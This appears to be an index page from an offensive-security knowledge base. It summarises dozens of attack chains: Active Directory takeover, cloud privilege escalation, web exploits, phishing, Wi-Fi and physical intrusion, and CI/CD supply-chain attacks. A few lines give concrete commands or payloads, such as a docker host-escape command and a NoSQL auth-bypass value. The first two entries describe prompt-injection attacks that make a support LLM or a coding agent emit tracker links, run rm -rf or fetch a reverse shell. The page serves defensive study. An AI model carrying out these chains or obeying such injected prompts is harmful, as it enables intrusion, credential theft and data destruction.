Customer chats with support LLM. Prompt injection makes the model emit a malicious markdown link / image; when an admin views the conversation in the support panel, JS / pixel-tracker fires.
- CredAcc
- Exec
- Impact
- IA
Filed by AD Knowledge Base - Nº 1125 steps
Prompt injection → tool-call shell RCE
Coding-assistant agent has a 'run command' tool. Hidden prompt in a README inside a project triggers `rm -rf` or fetches a reverse shell when the developer asks for help.
- Exec
- IA
- Persist
Filed by AD Knowledge Base - Nº 1136 steps
Vishing → helpdesk MFA reset → account takeover
Pose as a panicked employee locked out before a meeting. Helpdesk resets MFA based on partial PII (employee ID + date of birth from LinkedIn). Attacker registers their own factor.
- CredAcc
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 1146 steps
USB drop in parking lot → HID payload → C2
Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2.
- C2
- Exec
- IA
- Persist
Filed by AD Knowledge Base - Nº 1156 steps
RFID badge clone → after-hours access
Brush-pass a target employee with a long-range RFID reader, capture their HID/iCLASS card data, clone to a blank — return after hours to badge into restricted floors.
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 1166 steps
Compromised CFO mailbox → invoice fraud → wire fraud
AITM phishing nets the CFO's M365 session. Attacker sets a mail rule to hide replies, edits a pending invoice's wire details, sends the modified PDF to AP from the legit mailbox.
- Coll
- CredAcc
- Impact
- IA
Filed by AD Knowledge Base - Nº 1175 steps
TCC bypass → access Photos / Camera without consent
Inject into a process that already has Full Disk Access (e.g. backup utility, Terminal). Inherited TCC entitlement lets the attacker code read TCC-gated data — Photos, iMessage DB, Documents.
- CredAcc
- Evade
- Disco
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1185 steps
LaunchDaemon persistence as root
Once at root (via sudo or a local-exploit), drop a .plist into /Library/LaunchDaemons that re-implants on every boot — survives user logout and full power-cycle.
- Evade
- IA
- Persist
Filed by AD Knowledge Base - Nº 1195 steps
User foothold → keychain dump → cloud creds
Standard user shell on macOS. Brute the login.keychain master via ChainBreaker / a keylogged password; dump all entries — Safari saved creds, AWS keys, Slack tokens, SSO cookies.
- CredAcc
- Disco
- IA
Filed by AD Knowledge Base - Nº 1206 steps
ProxyLogon → webshell on Exchange → DA
Unauth SSRF + auth bypass against on-prem Exchange (CAS) — write a webshell as SYSTEM on the Exchange server, dump LSASS for cached domain creds, pivot to DA.
- CredAcc
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 1216 steps
ProxyShell → SYSTEM on Exchange → DA
Pre-auth ProxyShell chain (path confusion + EWS email-to-PowerShell + arbitrary file write) deploys a webshell as SYSTEM. Same post-exploitation as ProxyLogon.
- CredAcc
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 1225 steps
Autodiscover external leak → credential harvest
Mis-implemented Autodiscover falls back to autodiscover.<TLD>; register that domain externally, harvest plaintext Basic-auth credentials from clients that haven't been patched / configured properly.
- Coll
- C2
- CredAcc
- IA
- ResDev
Filed by AD Knowledge Base - Nº 1237 steps
pull_request_target injection → secrets → cloud takeover
A GitHub Actions workflow runs on pull_request_target and checks out the PR's head SHA. The attacker's PR injects code that runs with the base repo's secrets, including a cloud deploy role.
- CredAcc
- Exec
- IA
- Lat-Move
- Persist
- +1
Filed by AD Knowledge Base - Nº 1245 steps
PMKID attack → offline crack with no client interaction
WPA2 PMKID can be extracted from a single association attempt with the AP — no client needed. hcxdumptool + hashcat -m 22000 yields the PSK if it's weak.
- CredAcc
- Disco
- Exec
- IA
Filed by AD Knowledge Base - Nº 1255 steps
Evil twin + captive portal → credential harvest
Spoof the corporate SSID with a stronger signal and a captive portal that looks like the company AD login. Auto-connecting clients submit creds to the attacker page.
- CredAcc
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 1266 steps
WPA2-PSK handshake capture + crack → LAN access
Deauth a connected client to force re-association, capture the 4-way handshake with airodump-ng, crack the PSK offline with hashcat.
- CredAcc
- Disco
- Impact
- IA
- Recon
Filed by AD Knowledge Base - Nº 1274 steps
SharePoint / OneDrive public link enumeration → data dump
Bing / Grayhat Warfare reveals corporate SharePoint files shared 'with anyone' — financial docs, contracts, credentials in plaintext, etc.
- Coll
- Exfil
- Recon
Filed by AD Knowledge Base - Nº 1284 steps
Mailbox forwarding rule → silent data exfil
Compromised user account. Create an Inbox / transport rule that auto-forwards every incoming message to an external attacker mailbox — invisible until an admin reviews mailbox rules.
- Coll
- IA
Filed by AD Knowledge Base - Nº 1295 steps
AlwaysInstallElevated → SYSTEM via MSI
Both HKCU and HKLM AlwaysInstallElevated policies set to 1 — any user-installed MSI runs as SYSTEM. Drop a malicious MSI and install it.
- Disco
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1305 steps
Service account → SYSTEM via named-pipe impersonation
Service-context shell has SeImpersonatePrivilege. Use Potato-family tools (Juicy / Rogue / Print / God) to coerce SYSTEM to authenticate to an attacker-controlled named pipe, then impersonate the token.
- CredAcc
- Disco
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1315 steps
UAC bypass → elevated admin on a workstation
Standard medium-integrity admin user runs fodhelper / silentcleanup / computerdefaults auto-elevate bypass — gets a high-integrity session without a UAC prompt.
- CredAcc
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1325 steps
docker group membership → host root via container escape
User is in the docker group. `docker run -v /:/host --privileged alpine chroot /host` gives them root on the host without sudo.
- Disco
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1335 steps
polkit pwnkit (CVE-2021-4034) → instant root
Pre-2022 pkexec has a heap-overflow exploitable with no special permissions. Compile / drop the exploit, run as low-priv user, gain root.
- Disco
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1345 steps
sudo NOPASSWD on a shell-spawner → root
User has sudo NOPASSWD on a binary that can shell out (vi, less, awk, perl, python). Use the binary's escape sequence to drop into a root shell.
- Disco
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1355 steps
SUID binary → root via GTFOBins
Find an unusual SUID binary (find / nmap / vim / awk / less), check GTFOBins for the privilege-escalation primitive, spawn a root shell.
- Disco
- Exec
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1366 steps
MFA fatigue / prompt-bombing → M365 admin compromise
Attacker has the password (from breach / spray) but not MFA. Spam push approvals at 2 AM until the user taps yes out of habit — used in the Uber and 0ktapus breaches.
- Coll
- CredAcc
- Exec
- IA
- Persist
Filed by AD Knowledge Base - Nº 1376 steps
Browser-in-the-Browser → credential theft on a trusted page
Render a fake SSO popup inside the attacker page that looks like a real OS browser window. Victim types their credentials into the attacker's DOM.
- CredAcc
- Exec
- IA
Filed by AD Knowledge Base - Nº 1386 steps
OAuth device-code phishing → M365 access without a fake page
Initiate a device-code flow against login.microsoftonline.com; send the code + url to the victim via email or chat. Once they enter it, attacker gets access + refresh tokens.
- Coll
- CredAcc
- Exec
- IA
Filed by AD Knowledge Base - Nº 1397 steps
AITM phishing (Evilginx) → M365 session theft → mailbox exfil
Reverse-proxy phishing kit intercepts the entire login flow including MFA. Stolen session cookie → access M365 mailbox / SharePoint without retriggering auth.
- Coll
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 1405 steps
Dependency confusion → internal CI compromise
Publish a public npm package with the name of a target's private internal dependency at a higher version. CI resolves the public one first and runs install scripts in privileged CI.
- CredAcc
- Exec
- IA
- Recon
Filed by AD Knowledge Base - Nº 1415 steps
GitHub Action tag mutation → silent supply-chain hijack
Target pins an action by tag (uses: org/action@v3). Compromise the action repo and move the v3 tag to a malicious commit — every workflow using it pulls in the backdoor.
- CredAcc
- IA
- Persist
Filed by AD Knowledge Base - Nº 1426 steps
npm typosquat → developer workstation → corporate VPN
Publish a typosquat npm package; the developer's `npm install` runs the postinstall script, exfils SSH keys + VPN profile, then connects to the corporate network.
- CredAcc
- Disco
- Exec
- IA
Filed by AD Knowledge Base - Nº 1436 steps
ArgoCD weak RBAC → cluster admin via custom Application
ArgoCD installed with the default admin user and broad RBAC. Attacker creates an Application pointing at attacker manifests — ArgoCD syncs them with cluster-admin.
- CredAcc
- Disco
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1446 steps
Jenkins /script Groovy console → RCE → AD
Jenkins script console exposed unauth on the corporate intranet — Groovy 'execute()' = RCE as the Jenkins service account, often a domain user with broad agent access.
- CredAcc
- Disco
- Exec
- Lat-Move
Filed by AD Knowledge Base - Nº 1456 steps
Secret echoed to public build log → cloud takeover
A workflow accidentally runs `env` or `set -x` during debugging — the AWS access key is now in public CI logs and indexed by Google Cache / GitHub search.
- Coll
- CredAcc
- Disco
- IA
- PrivEsc
- +1
Filed by AD Knowledge Base - Nº 1466 steps
Self-hosted runner takeover → persistent CI compromise
A public repo with self-hosted GitHub runners accepts external PRs. First malicious PR runs on the runner; the workflow drops a runner-hook that fires before every future job.
- CredAcc
- Exec
- IA
- Persist
- PrivEsc
- +1
Filed by AD Knowledge Base - Nº 1476 steps
GitHub OIDC trust over-broad → AWS admin
An IAM role trusts GitHub Actions OIDC with a wildcard 'repo:*' subject. Any attacker GitHub repo can assume the role and run with its privileges.
- CredAcc
- IA
- Lat-Move
- Persist
- Recon
Filed by AD Knowledge Base - Nº 1485 steps
Rogue DHCP → DNS poisoning → MITM
Bring up a faster DHCP server on the segment; new clients get attacker as gateway + DNS — strip HTTPS, capture creds, inject payloads.
- CredAcc
- IA
Filed by AD Knowledge Base - Nº 1495 steps
VLAN hopping → cross into production
Discover that the access port negotiates trunking (DTP). Send double-tagged frames or set up a fake trunk to send packets into restricted VLANs.
- Disco
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 1506 steps
802.1X NAC bypass via printer MAC spoof
Plug into the LAN, sniff a printer / IP-phone MAC, clone it on your laptop, get full LAN access via MAC-Auth-Bypass — bypass NAC entirely.
- CredAcc
- Evade
- Disco
- IA
- Recon
Filed by AD Knowledge Base - Nº 1517 steps
mitm6 IPv6 SLAAC → NTLM relay → DA
Even when IPv4 is hardened, Windows clients prefer IPv6 with default DHCPv6. mitm6 makes the attacker the IPv6 DNS server, advertises wpad, and relays the captured NTLM to LDAPS for RBCD.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 1525 steps
CVE-2024-21626 (Leaky Vessels) → container escape
Outdated runc lets a malicious image escape during 'docker build' or 'docker run' via a leaked file descriptor pointing at the host filesystem.
- Persist
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1536 steps
Exposed etcd → cluster-wide secret raid
etcd is reachable without mTLS — read every Secret in the cluster including service-account tokens that grant cluster-admin.
- CredAcc
- Disco
- IA
- Persist
Filed by AD Knowledge Base - Nº 1546 steps
Docker socket exposed in pod → host root
A workload mounts /var/run/docker.sock for convenience; spawn a container with the host root mounted, then chroot in for root on the node.
- Disco
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1557 steps
Privileged pod escape → cluster admin
GenericWrite on a Deployment in the kube-system namespace lets you launch a privileged pod; the pod mounts the host filesystem and steals the kubeconfig of cluster-admin.
- CredAcc
- Disco
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1566 steps
GCP service account impersonation chain → project owner
Compromised low-priv SA has iam.serviceAccounts.getAccessToken on an intermediate SA; hop through 2-3 impersonations until you reach a project Owner.
- Disco
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 1575 steps
Compromised VM → Managed Identity → Subscription Owner
A VM with an over-privileged system-assigned managed identity is compromised; query IMDS for an Azure AD token, then assign yourself Owner on the subscription.
- Disco
- IA
- Lat-Move
- PrivEsc
Filed by AD Knowledge Base - Nº 1586 steps
Entra app consent phishing → Global Admin equivalent
Phish a privileged user to consent to an OAuth app requesting Directory.ReadWrite.All + RoleManagement.ReadWrite.Directory — the app then grants itself Global Administrator.
- IA
- Persist
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1597 steps
Public bucket → CI/CD secret leak → cloud takeover
A public S3 bucket hosts a build artefact containing CI tokens / .env files. Use them to push to the prod CI/CD pipeline and gain a deploy role.
- Coll
- CredAcc
- IA
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1609 steps
SSRF → IMDS → AssumeRole chain → Org admin
A web SSRF leaks the EC2 instance role; iam:PassRole + sts:AssumeRole hops across two member accounts land you with AdministratorAccess in the organisation's management account.
- CredAcc
- Disco
- Exec
- Lat-Move
- Persist
- +1
Filed by AD Knowledge Base - Nº 1616 steps
XXE → SSRF → IMDS → cloud creds
XML parser configured with external entities resolution. Use XXE to make the server hit IMDS and exfiltrate cloud credentials via DTD trickery.
- CredAcc
- IA
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 1625 steps
NoSQL injection → auth bypass → admin
Login endpoint passes user-supplied JSON into a MongoDB query. Send {"$ne": null} to bypass the password check.
- Coll
- Exfil
- IA
- Recon
Filed by AD Knowledge Base - Nº 1635 steps
Server-side prototype pollution → auth bypass → RCE
Merge / clone helper on user input pollutes Object.prototype. A later code path reads `isAdmin` from a fresh object and gets true — then a child-process gadget reaches RCE.
- Exec
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1646 steps
Source map exposure → API key leak → cloud takeover
Public *.js.map files reveal un-minified source and inline-committed API keys (cloud provider, third-party services). Use the keys directly.
- Exfil
- IA
- Recon
Filed by AD Knowledge Base - Nº 1655 steps
Single-packet race → coupon stacking
Coupon redemption check happens before the apply step. Send 20 redemptions in a single TCP packet — the app validates each in parallel and applies all of them.
- Exfil
- Impact
- Recon
Filed by AD Knowledge Base - Nº 1666 steps
GraphQL introspection → BOLA → mass enum
GraphQL endpoint exposes its full schema. Discover an unauth'd or under-authorized resolver, enumerate every user's data by iterating IDs.
- Disco
- Exfil
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1676 steps
Web cache poisoning → XSS → admin session hijack
An unkeyed header reflects into the response. Poison the cache with a payload, wait for an admin to fetch the cached page, exfiltrate their session.
- CredAcc
- Impact
- IA
Filed by AD Knowledge Base - Nº 1686 steps
HTTP request smuggling (CL.TE) → admin panel bypass
Frontend uses Content-Length, backend uses Transfer-Encoding. Smuggle a request whose path bypasses the frontend's authentication checks.
- Evade
- Exfil
- Impact
- PrivEsc
Filed by AD Knowledge Base - Nº 1696 steps
Java deserialization → ysoserial → RCE
An endpoint deserializes a Java object from user-controlled bytes. ysoserial produces a gadget chain whose readObject() reaches Runtime.exec().
- CredAcc
- Exec
- Recon
Filed by AD Knowledge Base - Nº 1706 steps
SSTI (Jinja2) → sandbox escape → RCE
User input rendered as a Jinja2 template instead of escaped. Escape the sandbox via __class__.__mro__ to reach subprocess and execute commands.
- Exec
- Recon
Filed by AD Knowledge Base - Nº 1716 steps
LFI → log poisoning → RCE
Local file inclusion that reads the web server's access log. Send a request whose User-Agent contains PHP, then LFI the log file to execute it.
- Exec
- Lat-Move
- Persist
Filed by AD Knowledge Base - Nº 1726 steps
File upload bypass → webshell → RCE
Upload filter checks extension or MIME but not magic bytes / final path. Bypass via double extension, content-type spoof, or polyglot, then call the dropped script.
- Exec
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 1736 steps
SSRF → IMDS → cloud creds → lateral
An image-fetcher / link-preview endpoint fetches attacker-controlled URLs server-side. Pivot to the cloud metadata service and steal the instance role credentials.
- CredAcc
- Disco
- IA
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 1746 steps
JWT RS256 → HS256 algorithm confusion → admin
Server verifies any algorithm declared in the JWT header. Sign an HS256 token using the public RSA key as the HMAC secret — server accepts it as legit.
- CredAcc
- Exfil
- Lat-Move
- PrivEsc
- Recon
Filed by AD Knowledge Base - Nº 1758 steps
OAuth redirect_uri misconfig → account takeover
Provider accepts loose redirect_uri matching (wildcard, partial, open-redirect chain). Steal the authorization code by redirecting it through an attacker host.
- CredAcc
- IA
- Lat-Move
- Recon
Filed by AD Knowledge Base - Nº 1767 steps
Subdomain takeover → cookie theft → account takeover
Dangling CNAME on a corporate subdomain (e.g. mail.target.com → unclaimed Heroku app). Claim it, serve a malicious page, harvest session cookies scoped to *.target.com.
- CredAcc
- IA
- Recon
Filed by AD Knowledge Base - Nº 1778 steps
SQLi (UNION) → DB dump → admin login
Discover a UNION-based SQL injection on a search/listing endpoint, enumerate the schema, dump the users table, and authenticate as an admin.
- Coll
- CredAcc
- IA
- Persist
- Recon
Filed by AD Knowledge Base - Nº 1788 steps
AS-REP roast → cracked user → Kerberoast → service-account admin
Anonymous attacker recovers a user password via AS-REP roasting, authenticates, kerberoasts a service account with weak password, and lands on a high-value server.
- CredAcc
- Disco
- IA
Filed by AD Knowledge Base - Nº 1796 steps
MSSQL linked-server crawl → cross-host RCE
Linked-server trust chains in MSSQL let a low-priv login execute as a higher-priv login on a remote SQL host — and pivot recursively across the estate.
- CredAcc
- Exec
- IA
- Lat-Move
- PrivEsc
Filed by AD Knowledge Base - Nº 1806 steps
RODC compromise → cracked NT hashes of revealed accounts
A Read-Only Domain Controller stores password material only for principals on its msDS-RevealedList. Compromising the RODC + cracking those hashes gives you the corresponding users.
- CredAcc
- Disco
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1814 steps
WSUS over HTTP → push code to managed clients
Clients using an HTTP WSUS server can be MITM'd to receive an attacker-signed (but Microsoft-trusted) auxiliary update that executes arbitrary commands as SYSTEM.
- CredAcc
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1825 steps
BadSuccessor (DMSA, 2025) → instant Domain Admin
Server 2025's Delegated Managed Service Accounts inherit the powers of any account listed in msDS-ManagedAccountPrecededByLink — letting an OU-admin escalate to DA without any patch chain.
- CredAcc
- IA
- Lat-Move
- PrivEsc
Filed by AD Knowledge Base - Nº 1835 steps
MachineAccountQuota abuse → RBCD takeover of a server
Default ms-DS-MachineAccountQuota = 10 lets any authenticated user create a computer account, which can then be used as the source principal in an RBCD attack.
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 1845 steps
DnsAdmins membership → SYSTEM on the DC
DnsAdmins members can load a DLL via the DNS service ServerLevelPluginDll registry value — the service runs as SYSTEM on the DC.
- CredAcc
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1855 steps
Group Policy Preferences cpassword → user takeover
Pre-MS14-025 GPPs left cpassword-encrypted credentials in SYSVOL with a published AES key. Any authenticated user can decrypt them.
- CredAcc
- Disco
- IA
Filed by AD Knowledge Base - Nº 1865 steps
SCCM Network Access Account disclosure → privileged creds
Any authenticated user on a SCCM-managed endpoint can recover the Network Access Account credentials from WMI / client cache — and the NAA is usually over-privileged.
- CredAcc
- Disco
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1877 steps
SCCM site takeover via NTLM relay (Takeover-1)
Coerce the SCCM site server to authenticate, relay to MSSQL on the site database, and grant yourself Full Administrator inside SCCM.
- CredAcc
- Disco
- Exec
- IA
- Lat-Move
- +1
Filed by AD Knowledge Base - Nº 1886 steps
ADCS ESC11 → certificate via RPC (no web enrollment)
When the CA's ICertPassage RPC interface allows NTLM without signing, relay any coerced auth directly to RPC and obtain a cert — bypasses HTTP-only mitigations.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 1895 steps
GPO write rights → Immediate scheduled task → SYSTEM on OU
GenericWrite on a linked GPO (or write rights to its SYSVOL folder) lets you drop a ScheduledTasks.xml that fires as SYSTEM on every machine in the OU at the next gpupdate.
- Disco
- Exec
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1905 steps
Shadow Credentials → PKINIT → NT hash
Where GenericWrite is held over a target, write a fake KeyCredentialLink (whfb-like) and authenticate via PKINIT to recover the target's NT hash.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 1915 steps
GenericWrite on Domain Admins → AddMember → DA
A misconfigured 'member' attribute write on a privileged group lets the attacker silently add themselves as a Domain Admin.
- CredAcc
- Disco
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1926 steps
WriteDACL on a privileged user → ForceChangePassword → takeover
Discover a misconfigured ACL that lets a low-priv user modify the ACL of a Tier-0 account, grant ForceChangePassword to themselves, reset the victim's password, and log in.
- CredAcc
- Disco
- IA
- PrivEsc
Filed by AD Knowledge Base - Nº 1936 steps
Cross-trust attack: child → parent forest via SID History
Forge an inter-realm TGT using a child domain's krbtgt and inject Enterprise Admins SID into SID History to traverse a non-quarantined trust.
- CredAcc
- Disco
- IA
Filed by AD Knowledge Base - Nº 1947 steps
Post-Domain Admin persistence: Golden Ticket + DCShadow + AdminSDHolder
Once Domain Admin is achieved, plant layered persistence so a krbtgt rotation, password resets, and ACL clean-up do not all evict the attacker.
- CredAcc
- Evade
- IA
- Persist
Filed by AD Knowledge Base - Nº 1955 steps
LAPS read → local admin on every endpoint
A delegated 'helpdesk' group gains read access to ms-Mcs-AdmPwd. Compromising any member of that group cascades to local admin on every LAPS-managed machine.
- CredAcc
- Disco
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 1967 steps
Unconstrained delegation → Capture DC TGT → DCSync
Compromise a host with TRUSTED_FOR_DELEGATION, coerce a DC to authenticate to it, harvest the DC's TGT from its LSASS, then DCSync.
- CredAcc
- Disco
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 1975 steps
RBCD abuse → SYSTEM on a domain host
A user with GenericAll/GenericWrite on a computer object writes msDS-AllowedToActOnBehalfOfOtherIdentity, then uses S4U2self/S4U2proxy to impersonate any user (including Administrator) on that host.
- IA
- Lat-Move
- Persist
Filed by AD Knowledge Base - Nº 1988 steps
No creds → Domain Admin via LLMNR poisoning and NTLM relay
Unauthenticated attacker on the LAN poisons name resolution, relays the captured NetNTLMv2 to a host with SMB signing disabled, then escalates to Domain Admin.
- CredAcc
- Disco
- Lat-Move
Filed by AD Knowledge Base - Nº 1997 steps
noPac / sAMAccountName spoofing → Domain Admin
Combine CVE-2021-42278 (sAMAccountName validation) and CVE-2021-42287 (PAC confusion) to impersonate a DC as a low-priv user.
- CredAcc
- IA
- Persist
- PrivEsc
Filed by AD Knowledge Base - Nº 2005 steps
ZeroLogon (CVE-2020-1472) → Domain takeover
Unauthenticated attacker abuses the Netlogon AES-CFB8 flaw to reset a DC's machine account password to empty, dumps secrets, and restores the original password.
- CredAcc
- Disco
- PrivEsc
Filed by AD Knowledge Base - Nº 2016 steps
PetitPotam + ADCS ESC8 → Domain Controller takeover
Coerce a DC's machine account to authenticate to the attacker, relay that NTLM to the ADCS HTTP web-enrollment endpoint, and obtain a DC certificate for full domain compromise.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base - Nº 2025 steps
ADCS ESC1 → Domain Admin
A low-priv domain user discovers a certificate template that lets enrollees supply an arbitrary subjectAltName, enrolls a cert as Administrator, and authenticates via PKINIT.
- CredAcc
- IA
- Lat-Move
Filed by AD Knowledge Base